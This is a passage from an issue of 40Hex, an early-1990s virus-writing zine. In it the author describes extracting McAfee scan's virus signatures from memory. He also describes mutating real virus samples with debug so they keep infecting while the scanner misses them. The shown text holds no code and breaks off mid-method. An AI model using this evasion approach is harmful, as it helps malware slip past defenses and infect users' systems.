|
this report.
|
|||
|
|
|||
|
---
|
|||
|
Mark H. Anbinder 607-257-2070 - FAX 607-257-2657
|
|||
|
BAKA Computers, Inc. QuickMail QM-QM 607-257-2614
|
|||
|
200 Pleasant Grove Road mha@baka.ithaca.ny.us
|
|||
|
Ithaca, NY 14850
|
|||
|
|
|||
|
-->-<----- Cut Here -------------------------
|
|||
|
40Hex Number 6 Volume 2 Issue 2 File 009
|
|||
|
|
|||
|
-=[ The 'McAfee scan' viral footprint codes ]=-
|
|||
|
|
|||
|
-or-
|
|||
|
|
|||
|
/*******************************************/
|
|||
|
/* A fool and his scanner, can part a user */
|
|||
|
/* from his hard earned money. */
|
|||
|
/*******************************************/
|
|||
|
|
|||
|
- written by -
|
|||
|
GodNet Raider
|
|||
|
- of -
|
|||
|
The CyberUnderground
|
|||
|
|
|||
|
|
|||
|
Thrown into 40Hex by DecimatoR
|
|||
|
from Usenet alt.security
|
|||
|
|
|||
|
-=[ "Information is the greatest weapon of power to the modern wizard." ]=-
|
|||
|
|
|||
|
]----------------------------------------------------------------------------[
|
|||
|
|
|||
|
Introduction:
|
|||
|
-------------
|
|||
|
|
|||
|
Recently I began to wonder about the usefulness of 'virus scanners'
|
|||
|
and what if any difference do they have with a simple text/hex search
|
|||
|
program (like nortons filefind/ts). An if there was no real DIFFERENCE,
|
|||
|
how secure is the system that used them.
|
|||
|
|
|||
|
Problems with scanning:
|
|||
|
-----------------------
|
|||
|
|
|||
|
The first question I had to ask was, What does a 'virus scanner' actually
|
|||
|
look for? Does it only look for one string of codes or several at different
|
|||
|
places in the file?
|
|||
|
|
|||
|
To answer this question I called a local BBS an dl'ed McAfee's
|
|||
|
scan3.7v64 (to evaluate and after my tests, it was erased for its lack of
|
|||
|
offering any real protection). Then I went to my archives to retrieve some
|
|||
|
viruses I have experimented with in the past (of which where Jerusalem B and
|
|||
|
Dark Avenger).
|
|||
|
|
|||
|
I ran scan to verify that the virus files where viruses (3 of which did
|
|||
|
not set off any alarm even tho there was a listing in the documentation for
|
|||
|
them, so I removed them from the test). Then using a sector editor looked at
|
|||
|
the source for the McAfee asso. scan3.7v64 (here after know just as scan64)
|
|||
|
to find that the footprint information was encoded. Needless to say this did
|
|||
|
not stop me (for the sake of those who are into the tech aspects of things,
|
|||
|
the actual method used to get the codes are included at the end of the
|
|||
|
article with the codes found), It took less than an hour to get the codes I
|
|||
|
was looking for (without disassembling the code but by looking into the
|
|||
|
memory allocated to the program).
|
|||
|
|
|||
|
What I found out was scan was just a simple hex searcher (that kept
|
|||
|
its data locked up till needed). It could also be fooled by any program
|
|||
|
that contained the same hex string as a real virus (this was proved when
|
|||
|
, using a sector editor, I added the scan64 footprint for the Jerusalem B
|
|||
|
into the top of a text file (a place this code would never show up in a real
|
|||
|
infection) then renamed it to *.com; scan64 reported it as infected).
|
|||
|
|
|||
|
Once the codes where obtained, using debug directly on a virus file,
|
|||
|
I was able to mutate the virus to no longer be detectable by scan64 without
|
|||
|
destroying the integrity of it. For the virus was still able to infect files,
|
|||
|
and scan64 could no longer track it. I was still able to track and control it
|
|||
|
using norton's filefind, diskmon, diskedit, and (of course) DOS erase.
|
|||
|
|
|||
|
So it seems my question was answered. Some 'virus scanners' just scan
|
|||
|
for a single string of hex character. This is fine if viruses NEVER changed
|
|||
|
or programs would NEVER use code similar to what a virus would (the smaller
|
|||
|
the footprint string the bigger the chance of mistaken alarms). For if
|
|||
|
a 'virus scanner' programer just keeps making a new release each time there
|
|||
|
is a new virus (an I will not get into the morality of charging customers
|
|||
|
the full price of an software upgrade rather than allowing them to buy/dl
|
|||
|
new footprint data files as they become available) for the program will
|
|||
|
eventually grow to unwealdable sizes. An it should be noted there are other
|
|||
|
programs that may do the same job faster, more upward compatibility, and
|
|||
|
you may already have them on hand.
|
|||
|
|
|||
|
a possible solution:
|
|||
|
--------------------
|
|||
|
|
|||
|
One thing that I think is a good idea is when a program allows users
|
|||
|
to add new footprint data to it (like nortons' virus package). For now
|
|||
|
users don't need to buy new releases for detection of viruses they may not
|
|||
|
get/be able to detect. Instead for the cost of a call to a support bbs (part
|
|||
|
of the original software agreement?) the user can get new data as it becomes
|
|||
|
available or when they fine a new one on their system they can immediately
|
|||
|
add the new footprint rather than wait for the next version to be released.
|
|||
|
|
|||
|
Method used to obtain footprints:
|
|||
|
---------------------------------
|
|||
|
|
|||
|
After finding the data I was looking for was encoded I thought, How can
|
|||
|
I get the data I wanted for my tests?
|
|||
|
|
|||
|
Disassembling was out, not for any MORAL reason but, for the time
|
|||
|
involved. So I thought it must have to decode the data for it's own use
|
|||
|
and to save time it would do it all before the scan rather than slow the
|
|||
|
process down by doing a full decode. So I needed to look at the memory
|
|||
|
image of the running program. Thanks to DOS 5.0 and dosshell I was able to
|
|||
|
do this.
|
|||
|
|
|||
|
After spawning the scan task under the dos shell I used alt-tab to
|
|||
|
swap back to the shell. Once back in the shell I used the shell commands to
|
|||
|
copy the |